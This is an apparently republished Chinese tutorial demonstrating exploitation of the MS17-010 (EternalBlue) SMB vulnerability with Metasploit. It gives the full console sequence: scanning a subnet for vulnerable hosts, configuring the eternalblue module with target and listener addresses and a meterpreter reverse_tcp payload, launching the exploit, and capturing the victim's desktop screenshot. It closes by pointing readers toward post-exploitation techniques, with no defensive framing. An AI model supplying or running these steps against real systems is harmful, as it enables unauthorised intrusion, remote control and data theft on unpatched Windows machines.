千家信息网

使用MSF对MS17-010的利用演示

发表于:2025-01-21 作者:千家信息网编辑
千家信息网最后更新 2025年01月21日,过程:1、扫描: 信息搜集(刺探)2、漏洞利用一、首先检测网段内存在漏洞的主机系统:使用命令:msf > use auxiliary/scanner/smb/smb_ms17_010 /
千家信息网最后更新 2025年01月21日使用MSF对MS17-010的利用演示

过程:

1、扫描: 信息搜集(刺探)

2、漏洞利用


一、首先检测网段内存在漏洞的主机系统:

使用命令:

msf > use auxiliary/scanner/smb/smb_ms17_010        //加载扫描expmsf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24    //配置扫描网段msf auxiliary(scanner/smb/smb_ms17_010) > run        //进行扫描

结果如下:

二、漏洞利用

msf利用命令如下:

msf > use exploit/windows/smb/ms17_010_eternalblue          //加载***模块msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25      //配置***目标IPRHOSTS => 192.168.22.25msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146        //配置本机IPLHOST => 192.168.5.146msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp     //配置回链方式payload => windows/x64/meterpreter/reverse_tcpmsf exploit(windows/smb/ms17_010_eternalblue) >

查看当前配置的payload

msf exploit(windows/smb/ms17_010_eternalblue) > show options    //查看配置选项Module options (exploit/windows/smb/ms17_010_eternalblue):   Name                Current Setting  Required  Description   ----                ---------------  --------  -----------   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.   GroomDelta          5                yes       The amount to increase the groom count by per try.   MaxExploitAttempts  3                yes       The number of times to retry the exploit.   ProcessName         spoolsv.exe      yes       Process to inject payload into.   RHOST               192.168.22.25    yes       The target address   RPORT               445              yes       The target port (TCP)   SMBDomain           .                no        (Optional) The Windows domain to use for authentication   SMBPass                              no        (Optional) The password for the specified username   SMBUser                              no        (Optional) The username to authenticate as   VerifyArch          true             yes       Check if remote architecture matches exploit Target.   VerifyTarget        true             yes       Check if remote OS matches exploit Target.Payload options (windows/x64/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     192.168.5.146    yes       The listen address   LPORT     4444             yes       The listen portExploit target:   Id  Name   --  ----   0   Windows 7 and Server 2008 R2 (x64) All Service Packsmsf exploit(windows/smb/ms17_010_eternalblue) >


发起***:

***命令: msf exploit(windows/smb/ms17_010_eternalblue) > exploit        //发起***

获取对方电脑桌面:

meterpreter > screenshotScreenshot saved to: /root/RBDEvfGv.jpeg    //可以到root目录下 查看对方电脑的截屏

获取shel权限

有关更多获取权限后的***技巧, 请自行百度 msf 后*** ***模块

0